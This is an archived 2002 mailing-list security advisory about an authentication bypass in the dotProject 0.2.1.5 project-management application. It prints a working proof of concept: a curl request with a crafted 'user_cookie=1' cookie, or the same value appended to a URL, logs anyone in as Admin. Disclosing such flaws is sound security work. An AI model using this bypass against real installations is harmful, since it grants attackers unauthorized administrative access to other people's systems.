|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: pokleyzz (pokleyzz_at_scan-associates.net)
Date: Sun Jul 28 2002 - 22:19:14 CDT
SCAN Associates Sdn Bhd Security Advisory
Product: dotProject 0.2.1.5 (possibly other)
Vendor URL: http://www.dotmarketing.org/dotproject/
Summary: php dotProject by pass authentication
Author: pokleyzz <pokleyzz
scan-associates.net>, sk <skscan-associates.net>,
shaharil <shaharilscan-associates.net>
Description
===========
dotProject is web base project management system .
This application consider as beta version.
Details
=======
Everyone can bypass authentication and login as Admin.
It was rather simple to exploit, user may send a crafted cookie like:
curl -b user_cookie=1 http://server/project/index.php?m=projects
Or simply append user_cookie=1 in any URL:
http://server/project/index.php?m=projects&user_cookie=1
Vendor Response
===============
Vendor has been contacted on 24/7/2002 but no reply.
www.scan-associates.net <http://www.scan-associates.net>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]